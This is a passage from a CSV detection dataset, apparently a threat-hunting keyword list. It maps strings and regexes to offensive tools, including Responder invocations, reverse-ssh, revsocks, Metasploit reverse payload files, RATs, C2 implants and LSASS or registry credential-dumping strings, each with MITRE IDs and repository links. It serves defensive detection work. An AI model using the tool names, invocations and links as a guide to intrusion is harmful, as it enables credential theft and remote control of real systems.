NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder -i *",".{0,1000}responder\s\-i\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder --interface*",".{0,1000}responder\s\-\-interface.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder.py -I *",".{0,1000}Responder\.py\s\-I\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*Responder.py*",".{0,1000}Responder\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Responder/tools/MultiRelay/bin/Runas.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Runas\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder/tools/MultiRelay/bin/Syssvc.exe*",".{0,1000}Responder\/tools\/MultiRelay\/bin\/Syssvc\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*responder-http-off*",".{0,1000}responder\-http\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*responder-http-on*",".{0,1000}responder\-http\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder-Session.log*",".{0,1000}Responder\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder-smb-off*",".{0,1000}responder\-smb\-off.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*responder-smb-on*",".{0,1000}responder\-smb\-on.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Responder-Windows*",".{0,1000}Responder\-Windows.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*RestartKeePass.ps1*",".{0,1000}RestartKeePass\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*restic2john.py*",".{0,1000}restic2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*restore_signature.sh *.dmp*",".{0,1000}restore_signature\.sh\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*RestrictedAdmin.exe*",".{0,1000}RestrictedAdmin\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","10","1009","205","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*Results are on disk, enumerating next DC!*",".{0,1000}Results\sare\son\sdisk,\senumerating\snext\sDC!.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*resuming a previous NTDS.DIT dump session *",".{0,1000}resuming\sa\sprevious\sNTDS\.DIT\sdump\ssession\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Retrieve Domain Cached Credentials hashes from registry*",".{0,1000}Retrieve\sDomain\sCached\sCredentials\shashes\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Retrieve LSA secrets stored in registry*",".{0,1000}Retrieve\sLSA\ssecrets\sstored\sin\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Retrieve Wdigest credentials from registry*",".{0,1000}Retrieve\sWdigest\scredentials\sfrom\sregistry.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*return-wizard-rce-exim.txt*",".{0,1000}return\-wizard\-rce\-exim\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*rev_kali_192_168_0_110_1234*",".{0,1000}rev_kali_192_168_0_110_1234.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*reveng007/C2_Server*",".{0,1000}reveng007\/C2_Server.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*reveng007/DarkWidow*",".{0,1000}reveng007\/DarkWidow.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*reveng007/Executable_Files*",".{0,1000}reveng007\/Executable_Files.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*reveng007/ReflectiveNtdll*",".{0,1000}reveng007\/ReflectiveNtdll.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*reveng007/SharpGmailC2*",".{0,1000}reveng007\/SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*RevengeRAT-Stub-CSsharp*",".{0,1000}RevengeRAT\-Stub\-CSsharp.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","1","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*reverse_shell_https.ps1*",".{0,1000}reverse_shell_https\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*reverse_shell_minified.js*",".{0,1000}reverse_shell_minified\.js.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*reverse_tcp_x64.rb*",".{0,1000}reverse_tcp_x64\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reverse_win_http.rb*",".{0,1000}reverse_win_http\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reverseDisableWinDef.cpp*",".{0,1000}reverseDisableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*ReverseProxy.dll*",".{0,1000}ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*ReverseShell.ps1*",".{0,1000}ReverseShell\.ps1.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*ReverseShell_20*.ps1*",".{0,1000}ReverseShell_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*ReverseSocksProxyHandler.*",".{0,1000}ReverseSocksProxyHandler\..{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*ReverseSocksProxyHandler.py*",".{0,1000}ReverseSocksProxyHandler\.py.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","767","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*reverse-ssh *@*",".{0,1000}reverse\-ssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh -p*",".{0,1000}reverse\-ssh\s\-p.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh -v*",".{0,1000}reverse\-ssh\s\-v.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh.exe*",".{0,1000}reverse\-ssh\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-ssh/releases/latest*",".{0,1000}reverse\-ssh\/releases\/latest.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-sshx64.exe*",".{0,1000}reverse\-sshx64\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*reverse-sshx86.exe*",".{0,1000}reverse\-sshx86\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*ReverseTCP.ps1*",".{0,1000}ReverseTCP\.ps1.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*ReverseTCPShell-main*",".{0,1000}ReverseTCPShell\-main.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*ReversingID/Shellcode-Loader*",".{0,1000}ReversingID\/Shellcode\-Loader.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*REVERST_CERTIFICATE_PATH*",".{0,1000}REVERST_CERTIFICATE_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_LOG*",".{0,1000}REVERST_LOG.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_PRIVATE_KEY_PATH*",".{0,1000}REVERST_PRIVATE_KEY_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_SERVER_NAME*",".{0,1000}REVERST_SERVER_NAME.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_TUNNEL_ADDRESS*",".{0,1000}REVERST_TUNNEL_ADDRESS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*REVERST_TUNNEL_GROUPS*",".{0,1000}REVERST_TUNNEL_GROUPS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*RevertToSelf was successful*",".{0,1000}RevertToSelf\swas\ssuccessful.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Revoke-Obfuscation*",".{0,1000}Revoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","696","119","2023-12-01T02:04:51Z","2017-07-11T01:20:48Z" "*revsockaddr.sin_addr.s_addr = inet_addr(*",".{0,1000}revsockaddr\.sin_addr\.s_addr\s\=\sinet_addr\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*revsocks - reverse socks5 server/client*",".{0,1000}revsocks\s\-\sreverse\ssocks5\sserver\/client.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks -connect*",".{0,1000}revsocks\s\-connect.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks -dns*",".{0,1000}revsocks\s\-dns.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks -listen*",".{0,1000}revsocks\s\-listen.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","0","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_darwin_amd64*",".{0,1000}revsocks_darwin_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*revsocks_freebsd_386*",".{0,1000}revsocks_freebsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" 